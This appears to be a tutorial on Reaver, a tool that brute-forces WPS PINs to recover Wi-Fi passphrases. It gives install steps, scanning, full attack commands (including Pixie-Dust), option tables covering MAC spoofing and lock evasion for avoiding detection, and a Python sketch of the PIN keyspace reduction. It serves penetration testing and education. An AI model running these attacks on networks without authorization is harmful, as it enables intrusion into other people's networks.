1. What is Reaver?
Reaver is a penetration testing tool designed to perform WPS (Wi-Fi Protected Setup) brute-force attacks against wireless networks. It targets routers with WPS enabled, exploiting vulnerabilities to recover the WPA/WPA2 passphrase. Reaver automates the process of guessing the WPS PIN, eventually revealing the network’s pre-shared key (PSK).
Key Features:
- Targets WPS-enabled routers.
- Automates PIN brute-forcing.
- Supports session resumption.
- Works with the Pixie-Dust attack (via the -K flag) for vulnerable routers.
- Compatible with wash (to scan for WPS-enabled networks).
How Reaver Works
Reaver exploits a design flaw in the WPS protocol: the access point confirms each half of the 8-digit PIN separately, and the last digit is a checksum, so an attacker needs at most about 11,000 guesses (10,000 for the first half plus 1,000 for the second) instead of 100 million. Once the PIN is recovered, the router hands over the WPA/WPA2 passphrase.
Steps:
- Scan for WPS-enabled networks (using wash).
- Launch Reaver against the target AP’s BSSID.
- Brute-force the WPS PIN (or use Pixie-Dust if supported).
- Retrieve the WPA/WPA2 passphrase upon successful PIN recovery.
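As an added illustration of the keyspace reduction described above (this is not code from the Reaver project): the checksum-digit rule is the one defined in the WPS specification, the function names are my own, and the 11,000 figure is derived by counting the guesses needed when the first and second halves of the PIN are confirmed independently.

```python
# Added example (not Reaver's own code): the WPS PIN checksum rule from the
# Wi-Fi Simple Configuration specification, and a count showing why an AP
# that confirms each PIN half separately leaves only 10^4 + 10^3 candidates.
# This is the reason the effective mitigation is to disable WPS entirely.

def wps_checksum(first_seven):
    """Return the 8th (checksum) digit for a 7-digit WPS PIN prefix.
    Digits in positions 1, 3, 5, 7 weigh 3; positions 2, 4, 6 weigh 1."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly 7 decimal digits")
    accum = 0
    for idx, ch in enumerate(first_seven):
        accum += (3 if idx % 2 == 0 else 1) * int(ch)
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin):
    """True if an 8-digit PIN carries the correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(pin[:7]) == int(pin[7])


def valid_pins_for_first_half(first_half):
    """All checksum-valid 8-digit PINs that start with a given 4-digit half.
    Exactly 1,000 exist: three free digits, then one forced checksum digit."""
    if len(first_half) != 4 or not first_half.isdigit():
        raise ValueError("expected exactly 4 decimal digits")
    pins = []
    for n in range(1000):
        prefix = first_half + "%03d" % n
        pins.append(prefix + str(wps_checksum(prefix)))
    return pins


def split_attack_search_space():
    """Worst-case guess count when the AP acknowledges the first half (after
    M4) and the second half (after M6) independently: every 4-digit first
    half, then every valid second half once the first half is confirmed."""
    first_half_guesses = 10 ** 4
    second_half_guesses = len(valid_pins_for_first_half("0000"))
    return {
        "first_half": first_half_guesses,
        "second_half": second_half_guesses,
        "total": first_half_guesses + second_half_guesses,  # 11,000
        "without_split": 10 ** 7,  # 8 digits, one of them a checksum
    }


if __name__ == "__main__":
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    print(split_attack_search_space())
```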
Installation
Reaver is pre-installed in Kali Linux. If missing, install it via:
```bash
sudo apt update
sudo apt install reaver
```
For the latest version (with Pixie-Dust support):
```bash
sudo apt install reaver-wps-fork-t6x
```
Basic Usage
Step 1: Identify WPS-Enabled Networks
Use wash to scan:
```bash
sudo wash -i wlan0
```
-i specifies the wireless interface (e.g., wlan0). The interface must already be in monitor mode (see Enabling Monitor Mode below).
Step 2: Launch Reaver Attack
```bash
sudo reaver -i wlan0 -b [BSSID] -vv
```
- -i: Interface (e.g., wlan0).
- -b: Target AP’s BSSID (MAC address).
- -vv: Verbose output (for debugging).
Advanced Usage
Pixie-Dust Attack (Faster Exploitation)
```bash
sudo reaver -i wlan0 -b [BSSID] -K 1 -vv
```
- -K 1: Enables the Pixie-Dust attack (works on vulnerable routers). Newer reaver-wps-fork-t6x builds accept a bare -K, as used in the examples further down.
Custom Delays & Timeouts
```bash
sudo reaver -i wlan0 -b [BSSID] -d 5 -l 30 -N -vv
```
- -d 5: Delay between PIN attempts (5 sec).
- -l 30: Wait 30 seconds before retrying when the AP reports WPS as locked.
- -N: Do not send NACK messages when out-of-order packets are received (--no-nacks).
Saving & Resuming Sessions
```bash
sudo reaver -i wlan0 -b [BSSID] -s session_file
```
- -s: Saves progress to a file so the attack can be resumed later.
Command-Line Options
Required Arguments
| Argument | Description | Example |
|---|---|---|
| -i, --interface= | Monitor-mode interface (must be in monitor mode) | -i wlan0mon |
| -b, --bssid= | Target AP’s MAC address (BSSID) | -b 00:11:22:33:44:55 |
Usage Note:
These two arguments are mandatory for any Reaver attack. Without them, the tool won’t execute.
Optional Arguments
| Argument | Description | Example |
|---|---|---|
| -m, --mac= | Spoof MAC address (avoid detection) | -m DE:AD:BE:EF:13:37 |
| -e, --essid= | Specify target AP’s ESSID (name) | -e "HomeWiFi" |
| -c, --channel= | Lock to a specific channel (disables hopping) | -c 6 |
| -s, --session= | Save/restore session progress | -s wps_session |
| -C, --exec= | Run a command after PIN recovery | -C "echo PIN found!" |
| -f, --fixed | Disable channel hopping (use with -c) | -f |
| -5, --5ghz | Target 5GHz networks (rarely used) | -5 |
| -v, --verbose | Verbosity level (-v, -vv, -vvv) | -vv |
| -q, --quiet | Suppress non-critical output | -q |
Advanced Options
Timing & Performance Control
| Argument | Description | Recommended Value |
|---|---|---|
| -d, --delay= | Delay between PIN attempts | -d 1 (default) |
| -l, --lock-delay= | Wait time if AP locks WPS | -l 60 (default) |
| -x, --fail-wait= | Sleep after 10 unexpected failures | -x 30 |
| -r, --recurring-delay= | Sleep y sec every x attempts | -r 3:10 |
| -t, --timeout= | Packet receive timeout | -t 5 |
| -T, --m57-timeout= | M5/M7 timeout (DIR-300/320) | -T 0.5 |
Attack Optimization
| Argument | Description | Use Case |
|---|---|---|
| -S, --dh-small | Use small DH keys (faster) | Slow routers |
| -L, --ignore-locks | Ignore AP lock state | Stubborn APs |
| -E, --eap-terminate | Send EAP FAIL to end session | Some enterprise APs |
| -F, --ignore-fcs | Ignore checksum errors | Bad signal |
| -w, --win7 | Mimic Windows 7 registrar | Avoid detection |
Pixie-Dust Attack (Critical)
| Argument | Description | Example |
|---|---|---|
| -K, --pixie-dust | Run Pixie-Dust attack | -K |
| -Z, --no-auto-pass | Do not automatically re-run Reaver to fetch the WPA passphrase after a successful Pixie-Dust run | -Z |
| -O, --output-file= | Save interesting packets to a pcap file | -O dump.pcap |
Practical Examples
1. Basic WPS PIN Brute-Force
```bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
```
2. Pixie-Dust Attack (Fast Exploitation)
```bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv
```
3. Custom Timing & Session Saving
```bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -d 3 -l 45 -s my_session -vv
```
4. MAC Spoofing + Channel Lock
```bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -m DE:AD:BE:EF:13:37 -c 6 -f -vv
```
5. Post-Success Command Execution
```bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -C "notify-send 'WPS PIN Found!'" -vv
```
Real-World Use Cases
- Penetration Testing: Auditing WPS vulnerabilities in a network.
- Wi-Fi Security Research: Testing router resilience against WPS attacks.
- Ethical Hacking: Recovering lost passwords (with permission).
- Network Forensics: Analyzing WPS weaknesses in enterprise setups.
Troubleshooting
Common Issues & Fixes
| Problem | Solution |
|---|---|
| “Failed to associate with AP” | Ensure monitor mode (airmon-ng start wlan0) |
| “WPS transaction failed” | Router may have locked WPS; wait and retry |
| “No WPS-enabled APs found” | Use wash to verify WPS status |
| Slow brute-forcing | Use -K (Pixie-Dust) if supported |
| Permission denied | Run with sudo |
Enabling Monitor Mode
```bash
sudo airmon-ng start wlan0
sudo reaver -i wlan0mon -b [BSSID] -vv
```